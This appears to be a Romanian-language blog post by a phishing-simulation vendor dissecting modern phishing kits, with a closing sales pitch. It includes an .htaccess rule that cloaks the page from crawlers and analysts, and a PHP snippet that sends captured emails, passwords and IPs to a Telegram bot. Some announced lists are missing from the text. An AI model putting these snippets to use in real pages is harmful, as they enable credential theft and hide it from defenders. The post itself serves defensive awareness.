← Toate articolele

Anatomia unui kit de phishing modern

GottaPhish Team · April 22, 2026

Un „kit de phishing” este baza de cod împachetată și reutilizabilă pe care atacatorii o desfășoară pentru a clona o pagină de autentificare, a recolta credențiale și a le exfiltra. Înțelegerea felului în care sunt construite aceste kituri — și a modului în care se ascund — face mult mai ușoară detectarea din timp a campaniilor și construirea unor simulări defensive convingătoare.

Ce conține un kit

Un kit tipic este o arhivă ZIP depusă pe o gazdă compromisă sau pe găzduire ieftină. Structura sa este remarcabil de constantă:

kit/
├── index.php            # pagina de destinație clonată
├── login.php            # tratarea formularului: captează + redirecționează credențialele
├── assets/              # copii fidele ale CSS, JS, siglelor, fonturilor
├── config.php           # ținta de exfiltrare (e-mail, bot Telegram, URL la distanță)
├── antibots.php         # liste de blocare pentru crawlere, sandbox-uri, cercetători
└── .htaccess            # rescrieri, filtrare geo/IP, protecție hotlink

Kiturile moderne sunt tot mai des vândute „ca serviciu” (PhaaS — Phishing-as-a-Service), cu tablouri de bord pe abonament, actualizări și suport.

Clona

Pagina de destinație este de obicei o copie octet cu octet a unui ecran de autentificare real, captată cu un „aspirator” de site sau cu un browser headless. Două indicii sunt frecvente:

Kiturile avansate fac proxy către site-ul real în timp real (un montaj adversary-in-the-middle cu unelte precum Evilginx), transmițând ce tastează victima către serverul autentic și furând cookie-ul de sesiune rezultat — ceea ce învinge cele mai multe MFA.

Stratul anti-analiză

Componenta antibots este cea care ține un kit în viață. Filtrează vizitatorii înainte de a servi pagina de phishing:

# extras din .htaccess
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|curl|python) [NC]
RewriteRule .* https://real-brand.example/ [R=302,L]

De aceea un URL care unui analist SOC „îi pare mort” era pe deplin activ pentru victimă cu câteva minute înainte.

Captarea și exfiltrarea credențialelor

Handlerul validează exact cât să pară real, apoi expediază datele. Canale de exfiltrare, aproximativ în ordinea popularității:

$msg = "u={$_POST['email']}&p={$_POST['pass']}&ip={$_SERVER['REMOTE_ADDR']}";
file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$ID&text=".urlencode($msg));
header("Location: https://real-brand.example/error");

Observați redirecționarea finală: după „autentificarea eșuată”, victima ajunge pe site-ul real, presupune o greșeală de tastare, se autentifică cu succes și nu bănuiește nimic.

Găzduire și livrare

Kiturile preferă infrastructura de unică folosință: site-uri WordPress compromise, redirecționări deschise pe domenii de încredere, domenii asemănătoare abia înregistrate și, tot mai des, servicii legitime (Cloudflare Workers, IPFS, SharePoint, Google Docs) pentru a le împrumuta reputația. Livrarea împerechează kitul cu o momeală — o factură, o „reverificare” MFA, o notificare de document partajat.

Detecție defensivă

Semnale care merită vânate:

Adevărul incomod: un kit AiTM bine construit învinge MFA prin SMS și prin aplicație furând tokenul de sesiune. Metodele rezistente la phishing — FIDO2 / passkey — sunt soluția durabilă.

Cum ajută GottaPhish

Kiturile de phishing moderne transformă în armă clonele fidele și furtul de sesiune AiTM, care înving chiar și MFA prin SMS și prin aplicație. GottaPhish și echipa sa de experți vă ajută să faceți față exact acestei amenințări: simulări sigure și complet auditate care reproduc kituri reale — linkuri cu token, fluxuri de captare a credențialelor, scenarii AiTM — cu tablouri de bord care arată ce momeli prind și unde rezistă MFA. Specialiștii noștri sprijină configurarea, concep scenarii care reproduc meșteșugul actual PhaaS și vă ajută să interpretați rezultatele ca instruire țintită și ca semnale concrete de inginerie a detecției pentru SOC-ul dumneavoastră.